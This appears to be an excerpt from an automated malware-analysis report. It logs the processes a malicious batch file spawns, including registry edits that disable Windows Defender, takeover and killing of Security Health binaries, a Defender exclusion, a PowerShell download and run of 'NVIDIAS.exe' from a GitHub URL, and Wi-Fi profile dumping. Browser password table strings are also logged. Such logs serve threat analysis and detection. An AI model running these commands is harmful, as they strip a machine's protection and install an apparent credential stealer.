Source: NVIDIAS.exe, 00000015.00000002.1214141492.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.00000000047C3000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.0000000004781000.00000004.00000800.00020000.00000000.sdmp, tmp44F4.tmp.dat.21.dr, tmp44F7.tmp.dat.21.dr, tmp44F6.tmp.dat.21.dr	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: NVIDIAS.exe, 00000015.00000002.1211552513.000000000362A000.00000004.00000800.00020000.00000000.sdmp, tmp44F5.tmp.dat.21.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: NVIDIAS.exe, 00000015.00000002.1214141492.0000000004703000.00000004.00000800.00020000.00000000.sdmp, NVIDIAS.exe, 00000015.00000002.1214141492.000000000473F000.00000004.00000800.00020000.00000000.sdmp, tmp44D3.tmp.dat.21.dr, tmp44D2.tmp.dat.21.dr, tmp44D4.tmp.dat.21.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\3gJQoqWpxb.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -window hidden -command ""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthService.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthSystray.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout.exe /t 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h "QQQ" /s /d
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\QQQ\NVIDIAS.exe NVIDIAS.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 716 -ip 716
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 3320
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -window hidden -command ""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthService.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthSystray.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /F	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout.exe /t 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h "QQQ" /s /d	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\QQQ\NVIDIAS.exe NVIDIAS.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /d	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles \| findstr All	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\takeown.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\QQQ\NVIDIAS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
